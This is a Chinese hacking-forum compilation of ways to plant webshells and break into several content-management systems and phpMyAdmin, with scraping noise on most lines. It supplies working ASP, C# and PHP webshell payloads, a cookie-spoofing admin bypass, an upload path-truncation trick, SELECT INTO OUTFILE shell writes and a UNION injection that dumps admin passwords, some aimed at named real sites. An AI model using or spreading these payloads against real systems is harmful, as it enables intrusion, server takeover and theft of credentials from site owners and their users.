& B8 E# v4 W- B- F) ?7 m: @& n<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 j4 I/ j0 m/ w) `" q
Upload a new file:<br>
- r6 o3 [7 P4 A* {" l<input type="file" name="NewFile" size="50"><br>
% S" n! ^! E6 G9 Q<input id="btnUpload" type="submit" value="Upload">
: [0 D1 U8 t5 `5 q6 e' n7 h</form>
# \7 { u: v' \0 q$ z! |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; ? L' q7 y5 i
9 a% D. h6 v% d( A6 x, \ GSDcms 后台拿webshell) f% y: [4 D5 k& W; V, O; d# m, b
[. G% ?1 ?! w# ]
第一种方法:
7 \+ Q1 o" ]" t' m! ]* K进入后台-->系统管理-->系统设置-->系统设置->网站名称;
; q% y r+ v$ |" @$ X" [2 o/ o把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx$ R3 E$ l D( v
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
2 C1 }& q+ K. |) A第二种方法:/ n( B, J! E; o5 L$ f/ O
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
% m5 w# {5 A# v1 a; m$ e# b在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
: ]! {$ ~" D; w# E) n ~4 U' ~第三种方法:
3 Z% V" e9 ] Y0 U4 v进入后台-->界面管理-->模板文件管理-->创建文件
7 { I4 A9 F( ~; |; e/ v3 v文件名写入getshell.ashx
3 c9 B, l3 l: n9 [! G( `' S/ O! f" ~内容写入下面内容:
% a2 u" Q# P3 c) o4 X f/====================复制下面的=========================/6 Z. i3 p6 F& z$ Q7 i, g$ ~
<%@ WebHandler Language="C#" Class="Handler" %> ]$ p, w% i" ~) z$ s4 q( k2 J
using System;2 }/ h' T* B1 \/ m
using System.Web;3 y* u9 h0 |( s* b+ k
using System.IO;+ Y3 ]; o* y' X0 A' l# D( i
public class Handler : IHttpHandler {1 x2 m9 i" n }' N: k
public void ProcessRequest (HttpContext context) {- _. W D1 d+ U- d4 b9 @7 Z
context.Response.ContentType = "text/plain";
+ H$ p2 w6 l4 J$ s0 h( Z4 ?3 ^StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! M/ Y; q8 f$ E# R. v" w$ Wfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");7 y* w" Z% D" L" X0 \; Y& w1 z
file1.Flush();
2 f8 p" |- W9 J' G0 J+ Yfile1.Close();
: A! p" w( B" X+ Z0 p( L' A}3 D0 n/ E+ G% j% S% {6 K4 `
public bool IsReusable {
0 ^# B8 Z) ~% \+ s6 Bget { z! U# h& C4 a% q% L. ?
return false;2 N! T9 A/ `- a: F, X6 T
}- B7 f, I0 w+ n( m5 v M
}
5 V2 {/ N4 n8 d$ m" }4 W}( B/ { w& X+ o6 f3 \8 S4 `. U" I. k
/=============================================/8 ?: G- O |9 @* r, b
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx3 g' x: m0 N1 m& U
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接. v! K! J; C7 |1 L; t' w7 N6 C
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& v0 ~0 a4 N' j V& K# I8 M/ @8 Z: F
2 K0 v& Q1 [& a* s5 H* GESCMS网站管理系统0day; f- Z8 D7 h; U6 x$ P
- W# j% D& S. G8 m$ }. E/ R后台登陆验证是通过admin/check.asp实现的. h+ G8 ^# S2 f& T
) C- A( u# V: z5 F) m首先我们打开http://target.com/admin/es_index.html
5 X3 r1 B2 N, a0 k) P3 w6 ]+ O6 @然后在COOKIE结尾加上- g- E: L$ m1 q9 T' ^
; ESCMS$_SP2=ES_admin=st0p;8 L2 u; f& `$ d4 V# t0 l i
修改,然后刷新
/ B; V0 _$ h7 s: d% ?' ^+ B进后台了嘎..
* ]2 l: S3 V5 D9 L" c9 Z然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
1 [' z- [" B! ~
: |9 D' i% j6 {& ^7 P9 `利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.) C! W: z/ Q( a( R& v
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp4 _& }# V' I1 s
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..0 S8 H& s9 z) G+ y4 b
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
8 e* B) | X" y7 o6 A$ ~------------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 W9 \' V; _" d
4 N) N5 y; U t0 e7 [( B宁志网站管理系统后台无验证漏洞及修复
0 @4 O% e7 X% Q- Z$ z! q3 S" H' Q3 A' i/ M1 s9 H6 _: L
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
" K) \* y: J8 o+ B+ y) O& S3 Q官方网站:www.ningzhi.net
! _1 S1 o* P2 y/ ]/ U; s6 l学校网站管理系统 V.2011版本
3 O- x5 f( z k0 jhttp://down.chinaz.com/soft/29943.htm 5 t5 y) I a" s1 a# U
其它版本(如:政府版等),自行下载.
" e3 {0 U- j# p3 ]* V6 T漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
+ I: @/ L* w3 J0 B, [3 [login.asp代码如下:
- U5 t2 U. C4 E4 T<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
% M) ?( x0 h" [9 `0 P, N* ?manage.asp代码我就不帖出来了.反正也没验证.
: b* [' d3 y N- r9 ^只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
- P/ z; Z3 U: n* M& a" B/ D漏洞利用:3 J$ Y8 L, b; O4 b
直接访问http://www.0855.tv/admin/manage.asp% f+ e# G2 k. E( s* R
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5+ S# R% N$ n |8 D
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ n9 J) D7 t" E! J3 c+ w/ s( M
2 s% ?( d4 f: Aphpmyadmin拿shell的四种方法总结及修复
D" m' E% R, X. z+ g* \+ ^5 r, Z% K8 [: |2 h1 G& t0 ] J" a
方法一:
7 N- K9 D: U) _CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );3 F" p: x1 b$ z s/ Y, g6 {& s
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');: V& `+ I6 C) G2 {$ f
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
% d+ D0 x7 f# s/ K4 ^" m _: [----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php* K; Y: n: F; t! c
一句话连接密码:7on& ` R: _9 v) g, m% ~5 V
方法二:
* \' `# ~$ u: T4 v% l. V2 O4 d读取文件内容: select load_file('E:/xamp/www/s.php');: P& s O5 Z$ s7 e. ?
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'5 u- _/ d/ s6 \7 G
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
5 Z# {( |2 z$ V0 @方法三:5 C7 v$ z, s% t, T. [1 @7 l
JhackJ版本 PHPmyadmin拿shell2 D U- H4 i$ J2 @8 ~" r. t
Create TABLE study (cmd text NOT NULL);
7 t0 K. U8 W! S, S) r+ o# ]8 D# CInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
2 |/ q" i- f5 |8 [5 e! Bselect cmd from study into outfile 'E:/wamp/www/7.php';# B5 L3 Z2 j. o4 h
Drop TABLE IF EXISTS study;. e" j2 X9 k9 y$ D" z1 M' F$ e) ~5 Z: d
<?php eval($_POST[cmd])?>
9 u6 u* k2 i0 J* dCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
5 r1 w* {! j4 TINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1( p( [' y* h# ]/ F
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
) o+ _( B( G3 [2 `DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
6 T( N% K; e% [8 }; S& W方法四:' g0 E% U4 \. D7 \' K
select load_file('E:/xamp/www/study.php');
' X4 h6 J; X- Oselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
8 F7 v( F1 i6 U9 i! ?9 P* N$ ]然后访问网站目录:http://www.2cto.com/study.php?cmd=dir3 _3 ^1 L# D/ j; @( D& S- j
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
- G) y' G+ c' h$ p- ~! `! W! ^! r4 `: g+ }
NO.001中学网站管理系统 Build 110628 注入漏洞( c% d" k5 Q$ Y; l8 F! K3 x
4 K9 C; u# y; YNO.001中学网站管理系统功能模块:
9 j/ b/ L c7 b1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等5 W. T: C# J; U& R
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
! g+ q8 K2 Q/ e3 S3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
$ r( Q% O5 k5 ?0 m' r C7 E4.视频图片管理:一级分类,动态添加视频或者图片等信息
# ?' p$ _1 ^6 a9 N5 m: x5.留言管理:对留言,修改,删除、回复等管理0 z1 P w' d- `0 E4 G5 }, a
6.校友频道:包括校友资料excel导出、管理等功能* L8 g S2 `0 _, X# b
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页* n y- y5 q% J2 G) f) W: h$ J
默认后台:admin/login.asp' X3 \; m% k" e! Z, U' d6 {
官方演示:http://demo.001cms.net& ?7 i6 w& Q; P+ N
源码下载地址:http://down.chinaz.com/soft/30187.htm* p$ \* o7 c6 h) g; [8 k& w, y
EXP:
# R( C k0 \5 Munion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
% \' t& {. ^6 P" m: w8 _: ]测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
( ]( \5 h9 A+ N- {/ [' j3 }getshell:后台有备份,你懂的* ]3 I: m6 C9 _, l. U
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
5 T( U3 D. W4 T: k. \- l" s------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对